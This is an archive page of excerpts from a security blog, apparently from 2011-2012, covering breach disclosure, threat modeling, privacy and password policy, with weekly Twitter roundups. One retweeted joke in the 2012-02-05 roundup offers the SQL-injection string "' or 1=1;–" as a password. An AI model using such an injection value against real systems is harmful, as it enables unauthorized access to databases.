The fine folks at Mozilla have announced that they’ll be hosting a BBQ in Dallas to thank all their supporters. And the cool thing about that BBQ is it’s gonna be vegan by default. You know, vegan. No animal products. It’s good for you. It’s the right default. They’ll have dead cow burgers, but you’ll […]

 

Feynman on Cargo Cult Science

On Twitter, Phil Venables said “More new school thinking from the Feynman archives. Listen to this while thinking of InfoSec.” During the Middle Ages there were all kinds of crazy ideas, such as that a piece of rhinoceros horn would increase potency. Then a method was discovered for separating the ideas–which was to try one […]

 

Edited Twitter Weekly Updates for 2012-06-10

RT @hellNbak_ @adamshostack @derekcslater anything with Scott Blake has to be worth reading. # RT @Beaker Updated BYOD security profile/policy pushed to my iPhone this morning. String passwords on phone unlock (really?) = PiTA. # Bad password policies give no benefit while absorbing your people's willingness to help with security. #Fail (cc @beaker) # RT […]

 

Twitter Weekly Updates for 2012-06-10

RT @DeathStarPR Easy way to feel like Darth Vader: stand over a heap of dirty laundry and imagine you've just killed a Jedi. #StarWars # RT @runasand We have managed to determine exactly how Ethiopia blocks #Tor and we have developed a workaround: https://t.co/snTjeVbN # RT @derekcslater What I learned when I left security http://t.co/AexcK8NN […]

 
 

CloudFlare's Post Mortem

In our continuing series of disclosure doesn’t hurt, I wanted to point out Cloudflare’s “Post Mortem: Today’s Attack; Apparent Google Apps/Gmail Vulnerability; and How to Protect Yourself.” Go take a look, it’s worth reading, especially the updates. I take three lessons from this: Disclosing an attack allows you to control the story, and is better […]

 

Edited Twitter Weekly Updates for 2012-06-03

Cool Stuff RT @SPACEdotcom SPLASHDOWN! @SpaceX #Dragon Space Capsule Ends Historic Mission with Pacific Ocean Splash http://t.co/3H3J1cXz Cool! IE10 in Win8 Release Preview has "Do Not Track" on by default! http://t.co/HHZv8cBw #privacy # RT @gabrielgironda WE ENCOURAGED PEOPLE TO LEARN TO PROGRAM AND JUST LOOK AT WHAT HAPPENED http://t.co/IE9HeNt3 # New blog: "Washington State Frees […]

 

Washington State Frees Liquor Sales: some quick thoughts

I hate to let an increase in liberty go by without a little celebration. For the past 78 years, Washington State has had a set of (effectively) state-operated liquor stores, with identical pricing and inventory. Today, that system is gone, replaced by private liquor sales. The law was overturned by a ballot initiative, heavily backed […]

 

Twitter Weekly Updates for 2012-05-27

Congratulations to the Egyptian people for claiming the right to vote for their President! # The ACLU of WA is looking for a technology & liberty director http://t.co/sUAFuDq7 # Things that shod not surprise me: Koalas smell like eucalyptus. # Powered by Twitter Tools

 

Twitter Weekly Updates for 2012-05-20

RT @votescannell Mother of 3 Arrested for Taking Pictures of Tourist Attraction at Airport http://t.co/Id8TKH9r // I feel safer already. # Freedom gropes for all @seatac! /cc @tsastatus. # RT @ashk4n WiFi Pineapple lets anyone with $90 to "compromise the sh*t out of anyone using WiFi in the area" http://t.co/TnR3n56k #armsrace # Great question for […]

 

My AusCert Gala talk

At AusCert, I had the privilege to share a the gala dinner stage with LaserMan and Axis of Awesome, and talk about a few security lessons from Star Wars. I forgot to mention onstage that I’ve actually illustrated all eight of the Saltzer and Schroeder principles, and collected them up as a single page. That […]

 

Twitter Weekly Updates for 2012-05-13

RT @Ellen_CK It appears that putting a contest in one's internal newsletter leads to people actually reading it #SEingmycoworkers # RT @bfist I like my risk like I like my steak << with blue cheese sauce? # RT @451wendy "Q: How many of the Fortune 500 are hacked right now? A: 500." http://t.co/I090fJmp <- Lovely […]

 

Why Sharing Raw Data is Important

Bob Rudis has a nice post up “Off By One : The Importance Of Fact Checking Breach Reports,” in which he points out some apparent errors in the Massachusetts 2011 breach report, and also provides some graphs. Issues like this are why it’s important to release data. It enables independent error checking, but also allows […]

 

What Kip Hawley Doesn't Understand About Terrorism

Former TSA Administrator Kip Hawley was on NPR a few minutes ago, opining on the 2nd panty bomber. He said two remarkable things. First, that the operators of nudatrons, who see thousands of naked people per day, would notice the bomb. Second, he didn’t understand why Al Qaeda would continue to focus on underwear bombs. […]

 

Twitter Weekly Updates for 2012-05-06

RT @netik You program in Rails? Check out Brakeman from our security team & make your code safer. http://t.co/nFPQ3cxx (go @presidentbeef!) # RT @KimZetter Equipment Maker Caught Installing Backdoor Vows to Fix After Public Pressure – http://t.co/EZfe7s27 # Pro tip: "Blackhat talks get lots of publicity" is not a reason *your* submission will make a […]

 

Study: More than 90% of Americans Take Action on Privacy

That’s my takeaway from a new study of 2,000 households by Consumer Reports: There are more than 150 million Americans using Facebook at this point, and that number is growing. … a new exhaustive study from Consumer Reports on social networking privacy found that 13 million American Facebook users have never touched their privacy settings. […]

 

Please Kickstart Elevation of Privilege

Jan-Tilo Kirchhoff asked on Twitter for a printer (ideally in Germany) to print up some Elevation of Privilege card sets. Deb Richardson then suggested Kickstarter. I wanted to comment, but this doesn’t fit in a tweet, so I’ll do it here. I would be totally excited for someone to Kickstarter production of Elevation of Privilege. […]

 

When an interrupt is important

So it’s cool that this “S.M.A.R.T” stuff tells the computer when the hard drive is failing. The next step in user interface is to take the message out of /Applications/Utilities/Disk Utility and into an interruptive UI, so that I don’t discover this problem when I happen to get an extra drive for backup. I know […]

 

Toorcamp: Gender Issues, Cognitive Psychology and Hacking

So the announcement for Toorcamp is out, and it looks like an exciting few days. A few talks already announced look very new school, including “How you can be an ally to us females” by Danielle Hulton and Leigh Honeywell, and “Cognitive Psychology for Hackers.” It’s in the far northwester corner of the US, and […]

 

How to get my vote for the ACM Board

I’m concerned about issues of research being locked behind paywalls. The core of my reason is that research builds on other research, and wide availability helps science move forward. There’s also an issue that a great deal of science is funded by taxpayers, who are prevented from seeing their work. One of the organizations which […]

 

Twitter Weekly Updates for 2012-04-22

RT @calyxinstitute We've reached over $50,000 in donations and are 44 donors shy of breaking 1,000! Help us keep the momentum going. # RT @deviantollam "It's a sad day in America when you're driving down the road one of these pulls up next to you: http://t.co/1Ksxn5ja " # RT @markrussinovich Debunking of exaggerated cybercrime stats […]

 

Suck My Underground

Hey! Jam Jarr has a new album and its free today. They asked for a Facebook link, and since I can’t do that, I figured a blog was in the right spirit. So go check it out: Jam Jarr: Suck My Underground. It’s free. Why not take a listen? PS: When I say free, I […]

 

Dennis Fisher's Novel ("Motherless Children") is out

You probably know Dennis Fisher because of his writings on Threatpost or his Digital Underground podcast, where I’ve appeared several times. I wanted to help him spread the news that his first novel “Motherless Children” is now available. You should check it out. I’ll get my review done shortly, but I wanted to help spread […]

 

Calyx and the Market for Privacy

So there’s a new startup in town, The Calyx Institute, which is raising money to create a privacy-protecting ISP and phone company. I think that’s cool, and have kicked in a little cash, and I wanted to offer up some perspective on the market for privacy, having tried to do this before. From 1999 until […]

 

Twitter Weekly Updates for 2012-04-15

RT @bruces http://t.co/7BfPuW40 *TSA really keen on putting the electronics border-crunch on dissidents << Worse, add http://t.co/3qTkucub # RT @justintroutman @csoghoian If there's one thing that will identify the right privacy expert, it's the urinalysis and one-year probation. # I bet Facebook is going to start auto-sepia toning everyone's pictures as they age. # New […]

 

Fascinating Storyline around Instagram & Facebook

First, congratulations to the folks at Instagram, who built something that was so valuable to Facebook and managed to get a great exit. Me, I suspect that Facebook did it so they can gradually sepia-tone all your photos, but that’s not important right now. I was struck by the nature of this article by the […]

 

Checklists and Information Security

I’ve never been a fan of checklists. Too often, checklists replace thinking and consideration. In the book, Andrew and I wrote: CardSystems had the required security certification, but its security was compromised, so where did things goo wrong? Frameworks such as PCI are built around checklists. Checklists compress complex issues into a list of simple […]

 

Edited Twitter Weekly Updates for 2012-04-08

Things I said: Google continues to hobble their services, push accounts/wallet names, now w/ Scholar http://t.co/IIQ7xk15 (cc @rileycrane @tgoetz @skud) # In other words, why not create timelines for every scholar who's published? That would be organizing the worlds info & making it useful. # You need a Google account to get that citation history, […]

 

Chaos Emerges from Demanding Facebook Passwords

On the off chance that you’ve been hiding under a rock, there’s been a stack of news stories about organizations (both private and governmental) demanding people’s Facebook passwords as part of the process of applying for jobs, with much associated hand-wringing. In “I hereby Resign“, Raganwald discusses the downside to employers of demanding to look […]

 

Dear FBI, Who Lost $1Billion?

In a widely discussed op-ed, Richard Clarke wrote: It’s not hard to imagine what happens when an American company pays for research and a Chinese firm gets the results free; it destroys our competitive edge. Shawn Henry, who retired last Friday as the executive assistant director of the F.B.I. (and its lead agent on cybercrime), […]

 

How Harvey Mudd Brings Women into CS

Back in October, I posted on “Maria Klawe on increasing Women in Technology.” Now the New York Times has a story, “Giving Women The Access Code:” “Most of the female students were unwilling to go on in computer science because of the stereotypes they had grown up with,” said Zachary Dodds, a computer scientist at […]

 

Edited Twitter Weekly Updates for 2012-04-01

That’s what I said: Photographers should check out these awesome lens physics simulations from Stanford http://t.co/hlNrqQT3 # Good article by @elinormills "Why data breach isn't a dirty word anymore" http://t.co/JXtTOTbT # New blog with a TED talk, "Doctors Make Mistakes, can we talk about that?" http://t.co/c00zcvMr # .@RSAConference can we go so far as "highly […]

 
 

How to mess up your breach disclosure

Congratulations to Visa and Mastercard, the latest companies to not notify consumers in a prompt and clear manner, thus inspiring a shrug and a sigh from consumers. No, wait, there isn’t a clear statement, but there is rampant speculation and breathless commentary. It’s always nice to see clear reminders that the way to get people […]

 

Cool Optics Flash Applets

Photographers should check out Flash applets on some technical aspects of photography at Stanford. The apps help you understand things like “Variables that Affect Exposure” (the aperture/time/ISO tradeoffs) as well as how lenses work, create depth of field, or how a telephoto lens bends the light. Very cool.

 

Doctors Make Mistakes. Can we talk about that?

That’s the title of this TED Talk, “Doctors Make Mistakes. Can we talk about that?” When was the last time you heard somebody talk about failure after failure after failure? Oh yeah, you go to a cocktail party and you might hear about some other doctor, but you’re not going to hear somebody talking about […]

 

Edited Twitter Weekly Updates for 2012-03-25

I’m continuing to tweak in the hopes of balancing useful & overwhelming. This week I’m not only cutting down the chaos a bit, but adding the emergent categories. Also, my tweets precede the Re-Tweets. Comments welcome. Where can I send people new to infosec for security mentoring, confident that they'll get broad, data-centered advice? (#newschool) […]

 

BSides Las Vegas 2012 Contest

BSides LV 2012 tickets sold out in under 30 hours last week. I have acquired five tickets to give away. More details later, but the tickets will go to the person or people who have the best story of how they applied the principles of the New School in a real life situation. Start planning […]

 

Does 1Password Store Passwords Securely?

In ““Secure Password Managers” and “Military-Grade Encryption” on Smartphones: Oh, Really?” Andrey Belenko and Dmitry Sklyarov write quite a bit about a lot of password management tools. This is admirable work, and I’m glad BlackHat provided a forum for it. However, as a user of 1Password, I was concerned to read the following about that […]

 

Edited Tweets for 2012-03-18

RT @curphey amazing how many serial entrepreneurs, visionaries & thought leaders in security are wanting to contract @ $75/hour # MT @GammaCounter Chinese spies impersonated US Navy admiral on Facebook, friended NATO officials: http://t.co/FFnpdJ9p via @adam_orbit # I really want @robinsage to RT this: Chinese spies impersonated US Navy admiral on Facebook, friended NATO officials: […]

 

Feelings! Nothing but feelings!

At BSides San Francisco, I met David Sparks, whose blog post on 25 security professionals admit their mistakes I commented on here. And in the department of putting my money where my mouth is, I talked him through the story on camera. The video is here: “Security Guru Tells Tale of How His Blog Became […]

 

Entice, Don't Scold

I really like what Adrian Lane had to say about the cars at RSA: I know several other bloggers have mentioned the exotic cars this year in vendor booths on the conference floor. What’s the connection with security? Nothing. Absolutely nothing. But they sure pulled in the crowds. Cars and booth babes with matching attire. […]

 

Kind of Copyrighted

This Week in Law is a fascinating podcast on technology law issues, although I’m way behind on listening. Recently, I was listening to Episode #124, and they had a discussion of Kind of Bloop, “An 8-Bit Tribute to Miles Davis’ Kind of Blue.” There was a lawsuit against artist Andy Baio, which he discusses in […]

 

Twitter Weekly Updates for 2012-03-11

Photo: "Barcelino Per Donna Welcomes RSA Conference 2012" somehow I perceive a mismatch http://t.co/qlKZIdId # RT @mikko Sony said that they lost Michael Jackson's entire unreleased back catalog in one of the 2011 breaches: http://t.co/KeYM9VyD # I sorta like this print, but I'm not sure I'd pay $12 Trillion for it. http://t.co/dzW8iEEl # RT @normative […]

 

Browser Privacy & Fingerprinting

Ivan Szekely writes in email: A team of young researchers – my colleagues – at the Budapest University of Technology and Economics developed a cross-browser fingerprinting system in order to demonstrate the weaknesses of the most popular browsers. Taking Panopticlick’s idea as a starting point, they developed a new, browser-independent fingerprinting algorithm and started to […]

 
 

How's that secrecy working out?

Last week at RSA, I was talking to some folks who have reasons to deeply understand a big and publicly discussed breach. I asked them why we didn’t know more about the breach, given that they’d been fairly publicly named and shamed. The story seems to be that after the initial (legal-department-driven) clampdown on talking, […]

 

Stop sinning with complaints about the coffee budget

Someone respected wrote on a private mailing list: “If you spend more on coffee than on IT security, then you will be hacked. What’s more, you deserve to be hacked.” — Richard Clarke, keynote address, RSA 2002 To which, verily I say: Doom! Doom! You commit the sin of false comparison! You have angered Furlongeous, […]

 

Twitter Weekly Updates for 2012-03-04

RT @tedfrank If you're having trouble getting Sudafed, here's how to make it with more readily available crystal meth. http://t.co/THaQZzov # RT @digiphile "Privacy breaches keep getting worse. Facebook admits reading txt msgs of users who installed phone app" http://t.co/v8CMM222 # RT @threatpost #Microsoft partners w/ Good Technology to bring encrypted email to Windows Phone. […]

 

Congratulations!

Our sincere congratulations to all the winners of the Social Security Blogger awards.

 

FEAR AND LOATHING IN SAN FRANCISCO (RSA PRE-GAME)

So it’s early Sunday AM, and I’m getting my RSA Schedule together finally.  So here’s what I’m looking forward to this week, leave us stuff in the comments if you’ve identified other cool stuff: =============== Monday:  8 freaking AM – I’m talking with Rich Mogull of @securosis about Risk Management.  Fun! Monday is also Metricon, […]

 

Twitter Weekly Updates for 2012-02-26

RT @internetlibre Twitter Censors Accounts Unfavorable To Nicolas Sarkozy http://t.co/wMGMuifY #netfreedom #internetlibre #sarkoCensure # RT @Dakami Pretty cool: @joncallas looked at all public keys signed by Entrust; none of them had reused RSA primes http://t.co/8JOsYQ9e # New blog: "It's a Lie: Seattle Taxpayers Will Pay for a Stadium" http://t.co/tkg3JxZi (cc @seattletimes) # Help Find the […]

 

Admitting Mistakes

Tripwire’s blog has “25 Infosec Gurus Admit to their Mistakes…and What They Learned from Them.” I’m glad to see attention paid to the simple reality that we all make mistakes. Extra points to Bill Brenner, Pete Lindstrom, Andrew Hay, Chris Wysopal, Rob Ton and Larry Ponemon for being willing to talk about mistakes that had […]

 

"Anonymized, of course"

I’ve noticed a couple of times lately that as people discuss talking about security incidents, they don’t only default to the idea of anonymization, they often insert an “of course” after it. But today I want to talk about the phrase “anonymized, of course”, what it means, why people might say it, and how members […]

 

Help Find the People Who Killed Ulf Möller

The family of Ulf Möller are asking for help in finding the people who murdered him, and asking for help spreading the word: They have a web site with details in English, German, Polish and Lithuanian: The two men are described as slim, both about 1.75 m to 1.80 m tall, between 20 and 30 […]

 

It's a Lie: Seattle Taxpayers Will Pay for a Staduim

The Seattle Times carries a press release: “Arena plan as solid as it looks?” The intricate plan offered for an NBA and NHL arena in Sodo hinges on the untested strategy of building a city-owned, self-supporting arena, without the aid of new taxes, and with team owners — not taxpayers — obligated to absorb any […]

 

Twitter Weekly Updates for 2012-02-19

RT @csoghoian If Path-like apps that pilfered user contact data suffered a data breach, existing laws wouldn't require disclosure to users. # New quickie blog: Bismark's Voice http://t.co/zk01Biec # RT @paulmadsen Sharingfreude, n. – pleasure derived from inadvertent sharing of personal information on social media by friends & colleagues # .@dakami @jeremiahg @tqbf see also […]

 

New Cyber Security Bill: Crowdsource Analysis?

A lot of people I trust are suggesting that the “Collins-Lieberman” bill has a substantial chance of passing. I have some really interesting (and time-consuming) work tasks right now, and so I’m even more curious than usual what you all think, especially how this According to the press release, the “Collins-Lieberman” bill would: The Department […]

 

Predictably Apathetic responses to Cyber Attack

Wh1t3Rabbit has a great post “Understanding the apathetic response to a cyber attack:” Look, Dana’s right. His business is the organizing and promotion of the UFC fights. Secondary to that business is the merchandising and other aspects of the UFC – but that probably is a significantly smaller portion of the overall company revenue. Now […]

 

Bismark's Voice

Tucked away for decades in a cabinet in Thomas Edison’s laboratory, just behind the cot in which the great inventor napped, a trove of wax cylinder phonograph records has been brought back to life after more than a century of silence. The cylinders, from 1889 and 1890, include the only known recording of the voice […]

 

Twitter Weekly Updates for 2012-02-12

RT @tkeanini Overcoming the fear of disclosure http://t.co/DZdkeyNh << TK is spot on. Our fear blocks feedback loops. # MT @qld_oic ..empowering young people to establish good cyber safety behaviour #oicprivacycomp http://t.co/vkr3VZ3A [$1000 prize for video] # RT @mortman Yet More On Threat Modeling: A Mini-Rant http://t.co/ZPxVa9HE cc @adamshostack @alexhutton #newschool # RT @securityskeptic @mortman […]

 

Book Review: Cloud Security Rules

A while back, Kai Roer graciously sent me an electronic copy of the book Cloud Security Rules that he co-authored with an all-start cast including luminaries Wendy Nather and our very own New School’s Alex Hutton. All in all, it’s a solid read covering the gamut of topics from Risk and Compliance to technology versus […]

 

Have You Seen The Little Piggies?

Apparently, the project manager who found a vendor for the Vermont State Police car decals failed to consider a few things. Such as the risk that prisoners might want to have a little fun at the expense of the police. You can see the fun if you study the image carefully here, or in a […]

 

Why Breach Disclosures are Expensive

Mr. Tripathi went to work assembling a crisis team of lawyers and customers and a chief security officer. They hired a private investigator to scour local pawnshops and Craigslist for the stolen laptop. The biggest headache, he says, was deciphering how much about the breach his nonprofit needed to disclose…Mr. Tripathi said he quickly discovered […]

 

Yet More On Threat Modeling: A Mini-Rant

Yesterday Adam responded to Alex’s question on what people thought about IanG’s claim that threat modeling fails in practice and I wanted to reiterate what I said on twitter about it: It’s a tool! No one claimed it was a silver bullet! Threat modeling is yet another input into an over all risk analysis. And […]

 

On Threat Modeling

Alex recently asked for thoughts on Ian Grigg’s “Why Threat Modeling Fails in Practice.” I’m having trouble responding to Ian, and have come to think that how Ian frames the problem is part of my problem in responding to him. So, as another Adam likes to say, “

 

Twitter Weekly Updates for 2012-02-05

RT @Entropologist Passwords should be a mix of letters, numbers, special characters and longer than 8 characters… like "' or 1=1;–" # RT @ioerror Researchers taking a stand against Elsevier: http://t.co/TMZqj2E9 # RT @ashk4n Even experts are having a hard time differentiating between android malware & mobile ads these days http://t.co/t5qAQANP # Tinker, Tailor is […]

 

Dear Verisign: Trust requires Transparency

On their blog, Verisign made the following statement, which I’ll quote in full: As disclosed in an SEC filing in October 2011, parts of Verisign’s non-production corporate network were penetrated. After a thorough analysis of the attacks, Verisign stated in 2011, and reaffirms, that we do not believe that the operational integrity of the Domain […]

 
 

Threat Modeling Fails In Practice

Would be interested in readers thoughts on Ian G’s post here: https://financialcryptography.com/mt/archives/001357.html

 

Pulling A Stiennon: In The Cloud, The DMZ Is Dead

Calling something in the cloud a DMZ is just weird. Realistically, everything is a DMZ. After all, you are sharing data center space, and if your provider is using virtualization, hardware with all of their other customers. As such, each and every network segment you have is (or should be) isolated and have only a […]

 

Time for an Award for Best Data?

Yesterday, DAn Kaminsky said “There should be a yearly award for Best Security Data, for the best collection and disbursement of hard data and cogent analysis in infosec.” I think it’s a fascinating idea, but think that a yearly award may be premature. However, what I think is sorta irrelevant, absent data. So I’m looking […]

 

More on Real Name Policies

There were a couple of excellent posts about Google+ which I wanted to link in, but the post took a different path: “Google+ and The Trouble With Tribbles” The trouble with social is that it is social – with all the norms, behaviors and expectations that come with that. You cannot re-engineer that overnight (Facebook […]

 

Sharing Research Data

I wanted to share an article from the November issue of the Public Library of Science, both because it’s interesting reading and because of what it tells us about the state of security research. The paper is “Willingness to Share Research Data Is Related to the Strength of the Evidence and the Quality of Reporting […]

 

Yes, Google+ Is a Failure

One of the most common bits of feedback about my post “Google+ Failed Because of Real Names” is that Google+ is now a huge service, and that the word failed is an exaggeration, or a trick of the rhetorician. Some folks might advise me to stop digging a hole, put down the shovel and walk […]

 

A quick pointer

I wrote a blog post regarding the BSidesSF/RSA conf dust-up. (If I knew how to work Adam’s twitter integration thingy, you’d have been spared this)

 

Twitter Weekly Updates for 2012-01-29

Vincent Brown (@politico_ie) should be given an uninterrupted hour with the ECB execs: https://t.co/SZYOtveo # RT @marciahofmann Supreme Court: government installation & use of a GPS device to monitor a vehicle's movements is a 4th Amendment search. # RT @normative RT @thinkprogress: BREAKING: Rand Paul is being detained by TSA in Nashville (via @moirabagley) < […]

 

Aviation Safety

The past 10 years have been the best in the country’s aviation history with 153 fatalities. That’s two deaths for every 100 million passengers on commercial flights, according to an Associated Press analysis of government accident data. The improvement is remarkable. Just a decade earlier, at the time the safest, passengers were 10 times as […]

 

Google+ Failed Because of Real Names

It’s now been a few months since the launch of Google+, and it’s now fairly clear that it’s not a mortal threat to Facebook, or even Orkut. I think it’s worth thinking a bit about why Google+ isn’t doing better, despite its many advantages. Obviously, Google wants to link Google+ profiles to things in the […]

 

Turn Off Javascript

For @weldpond: Please turn off JavaScript. We don’t require it and it only increases your vulnerability.

 

Vendor shout out: Gourmet Depot

You know those random parts of kitchen appliances that break, and the manufacturer is no longer making, and so you buy a new one that breaks after 4 months? Yeah, you know what I’m talking about. Next time, look to Gourmet Depot and see if they have replacement parts. It was easy to find their […]

 

Kudos to Ponemon

In the past, we have has some decidedly critical words for the Ponemon Institute reports, such as “A critique of Ponemon Institute methodology for “churn”” or “Another critique of Ponemon’s method for estimating ‘cost of data breach’“. And to be honest, I’d become sufficiently frustrated that I’d focused my time on other things. So I’d […]

 

Twitter Weekly Updates for 2012-01-22

What's the best history of @Defcon Capture the Flag? (cc @rileycaezar @thedarktangent ) # RT @thedarktangent What's the best history of #DEFCON Capture the Flag? @adamshostack asks, & we need to update the site. Send your links! # RT @jccannon7 My sci fi book launches today. More info at http://t.co/bVd8mUSg # RT @mortman New posts: […]

 
 

Oracle's 78 Patches This Quarter, Whatever…

There’s been a lot of noise of late because Oracle just released their latest round of patches and there are a total of 78 of them. There’s no doubt that that is a lot of patches. But in and of itself the number of patches is a terrible metric for how secure a product is. […]

 

Seattle in the Snow

(From The Oatmeal.) It’s widely understood that Seattle needs a better way to measure snowfall. However, what’s lacking is a solid proposal for how to measure snowfall around here. And so I have a proposal. We should create a new unit of measurement: The Nickels. Named after Greg Nickels, who lost the mayorship of Seattle […]

 

Ulf Muller

I am saddened to pass on the news that Ulf Müller, a colleague at Zero-Knowledge Systems, has died in tragic and violent circumstances. I remember Ulf as quiet, gentle, kind and am tremendously saddened by his loss. The most recent news story is “Computer-Experte in Transporter erschlagen“. Nils Kammenhuber of the Technical University of Munich […]

 

Please Participate: Survey on Metrics

I got an email from my friend John Johnson who is doing a survey about metrics.  If you have some time, please respond… ———————————————————————————————————————————————— I am seeking feedback from others who may have experience developing and presenting security metrics to various stakeholders at their organization. I have a number of questions I’ve thought of, and […]

 

Continuous Deployment and Security

From an operations and security perspective, continuous deployment is either the best idea since sliced bread or the worst idea since organic spray pancakes in a can. It’s all of matter of execution. Continuos deployment is the logical extension of the Agile development methodology. Adam recently linked to an study that showed that a 25% […]

 

Chocolate Waffles

Too good not to share (inspired by: Chocolate-Hazelnut Waffles with Frangelico-Brown-Butter Syrup) Ingredients : 6 oz. (1-1/3 cups) fresh ground whole-wheat flour 2 oz. (2/3 cup) natural cocoa powder 1-1/2 tsp. baking powder 1/2 tsp. baking soda 1 tsp. kosher salt 3/4 cup granulated palm sugar 2 large eggs, at room temperature 3 oz. (6 […]

 

Twitter Weekly Updates for 2012-01-15

New blog: Shocking News of the Day: Social Security Numbers Suck http://t.co/VuMV3faO # RT @PogoWasRight Does *any* federal govt agency actually respond to FOI requests within 20 days? << Send GAO a FOIA with that question? 🙂 # RT @Digital4rensics On Computer Security Incident Information Sharing: http://t.co/GhGYOOjP – New Post Up! # New worst practice: […]

 

Please vote New School

We’re honored to be nominated in three categories for the Security Bloggers Awards: Most Educational Most Entertaining Hall of Fame On behalf of all of us who blog here, we’re honored by the nomination, and would like to ask for your vote. We’d also like to urge you to vote for our friends at Securosis […]

 

Please vote New School

We’re honored to be nominated in three categories for the Security Bloggers Awards: Most Educational Most Entertaining Hall of Fame On behalf of all of us who blog here, we’re honored by the nomination, and would like to ask for your vote. We’d also like to urge you to vote for our friends at Securosis […]

 

The New School of Software Engineering?

This is a great video about how much of software engineering runs on folk knowledge about how software is built: “Greg Wilson – What We Actually Know About Software Development, and Why We Believe It’s True” There’s a very strong New School tie here. We need to study what’s being done and how well it […]

 

Google+ is not a space for free expression

Earlier today I noticed something funny. My Google profile picture — the picture associated with my Gmail account, my GChat account, my Google+ account, etc — had vanished. A bug? Nope. It turns out, Google — without telling me — went into my account and deleted my profile picture. See “Dear Google+” for the details […]

 

New School Approaches to Passwords

Adam Montville left a comment on my post, “Paper: The Security of Password Expiration“, and I wanted to expand on his question: Passwords suck when they’re not properly cared for. We know this. Any other known form of authentication we have is difficult because of the infrastructure required to pull it off. That sucks too. […]

 
 

Shocking News of the Day: Social Security Numbers Suck

The firm’s annual Banking Identity Safety Scorecard looked at the consumer-security practices of 25 large banks and credit unions. It found that far too many still rely on customers’ Social Security numbers for authentication purposes — for instance, to verify a customer’s identity when he or she wants to speak to a bank representative over […]

 

Twitter Weekly Updates for 2012-01-08

RT @RegoftheDay Happy new year! 40,000 new laws take effect starting today. http://t.co/EOVyRya9 # RT @StevenLevy Always suspected those xray "backscatter" machines will kill more of us than terrorists will. Now this. http://t.co/ag2lFWWc # New podcast with @dgwbirch: http://t.co/HKeKOVyW # New short blog: "The irony overfloweth" http://t.co/6VsrF9JO # Wow. The Wikipedia article on Infosec certifications […]

 

Paper: The Security of Password Expiration

The security of modern password expiration: an algorithmic framework and empirical analysis, by Yingian Zhang, Fabian Monrose and Michael Reiter. (ACM DOI link) This paper presents the first large-scale study of the success of password expiration in meeting its intended purpose, namely revoking access to an account by an attacker who has captured the account’s […]

 

Steve Bellovin's "Lessons from Suppressing Research"

Steve Bellovin has a good deal of very useful analysis and context about “an experiment that showed that the avian flu strain A(H5N1) could be changed to permit direct ferret-to-ferret spread. While the problem the government is trying to solve is obvious, it’s far from clear that suppression is the right answer, especially in this […]

 

New podcast with Dave Birch

I really enjoyed a conversation with Dave Birch for Consult Hyperion’s “Tomorrow’s Transactions” podcast series. The episode is here. We covered the New School, lessons learned from Zero-Knowledge Systems, and games for security and privacy.

 

The Irony Overfloweth

@RobArnold tweeted: “Someone thinks targeted Facebook ads are an effective way to ask for Firefox features. Any other Mozillians see this?” The irony of using a targeted ad, on Facebook, to ask for more privacy protection…

 

Twitter Weekly Updates for 2012-01-01

RT @timoreilly Amazon patents inferring religion from choice of wrapping paper http://t.co/MmCMx2OO << Over the "creepy" line # RT @kevinmitnick Did you ever want a blue box to make free calls? Now you can in the Apple app store. Search for "blue box". EPIC!!! # I wonder what Woz thinks of being able to get […]

 

Cello Wars

For your holiday amusement: Thanks, Jeff!

 
 

Twitter Weekly Updates for 2011-12-25

Weekend NewSchool blog: "APT Didn't Eat our Theme. Adam Did." http://t.co/JDvLTayG (cc @RealGeneKim, @alexhutton ) # Really, TSA? The airline isn't allowed to auto-enter my freakin' date of birth? Has anyone calculated lifetimes wasted on red tape? # RT @BillBrenner70 Stop them before they predict again! http://t.co/7qzuTchU # I predict 90% of 2012 infosec predictions […]

 

Discussing Norm Marks' GRC Wishlist for 2012

Norm Marks of the famous Marks On Governance blog has posted his 2012 wishlist.  His blog limits the characters you can leave in a reply, so I thought I’d post mine here. 1.  Norm Wishes for “A globally-accepted organizational governance code, encompassing both risk management and internal control” Norm, if you mean encompassing both so […]

 

Niels Bohr was right about predictions

There’s been much talk of predictions lately, for some reason. Since I don’t sell anything, I almost never make them, but I did offer two predictions early in 2010, during the germination phase of a project a colleague was working on. Since these sort of meet Adam’s criteria by having both numbers and dates, I […]

 

The New School of Security Predictions

Bill Brenner started it with “Stop them before they predict again!:” My inbox has been getting hammered with 2012 vendor security predictions since Halloween. They all pretty much state the obvious: Mobile malware is gonna be a big deal Social networking will continue to be riddled with security holes Technologies A, B and C will […]

 

The Pre-K underground?

Not my headline, but the New York Times: Beyond the effort was the challenge of getting different families to work together. When matters as personal as education, values and children are at stake, intense emotions are sure to follow, whether the issue is snacks (organic or not?), paint (machine washable?) or what religious holidays, if […]

 

Owning Up to Pwnage (Part 2)

On Saturday, I discussed how “I bolluxed our blog theme.” “More to the point, we here at the New School talk a good game about how we need to talk about problems, rather than cover them up. So here’s our money where our mouths are. I, Adam Shostack, screwed up the blog presentation by not […]

 

Twitter Weekly Updates for 2011-12-18

RT @jeremiahg "HBGary not only didnt lose biz customers in the past year, but "got additional business" -Hoglund http://t.co/ap9pP39F # RT @bobblakley @Judgenap "Timid men prefer the calm of despotism to the tempestuous sea of liberty." Thomas Jefferson # Weekend blog "Threat Modeling & Risk Assessment" follows up on conversation with @451wendy http://t.co/iFCRCJW3 # RT […]

 

APT didn’t eat our theme. Adam did.

If you read this blog with a web-reader, you’ll note our (ahem) excellent new theme, and may be saying, wow, guys, “nice job” Yeah. Ooops. I upgraded to WordPress 3.3, and upgraded our theme, and in so doing, overwrote some of the CSS that Alex had tweaked. I didn’t test, and so things were wonky. […]

 

ThreatPost Podcast with Adam Shostack

Last week I did a podcast with Dennis Fisher. In it, we touched on what I might change in the book. Take a listen at: “Adam Shostack on Methods of Compromise, the New School and Learning“

 

Outrage of the Day: DHS Takes Blog Offline for a year

Imagine if the US government, with no notice or warning, raided a small but popular magazine’s offices over a Thanksgiving weekend, seized the company’s printing presses, and told the world that the magazine was a criminal enterprise with a giant banner on their building. Then imagine that it never arrested anyone, never let a trial […]

 

The output of a threat modeling session, or the creature from the bug lagoon

Wendy Nather has continued the twitter conversation which is now a set of blog posts. (My comments are threat modeling and risk assessment, and hers: “That’s not a bug, it’s a creature. “) I think we agree on most things, but I sense a little semantic disconnect in some things that he says: The only […]

 

Top 5 Security Influencers of 2011

I really like Gunnar Peterson’s post on “Top 5 Security Influencers:” Its December and so its the season for lists. Here is my list of Top 5 Security Influencers, this is the list with the people who have the biggest (good and/or bad) influence on your company and user’s security: My list is slightly different: […]

 

"Can copyright help privacy?"

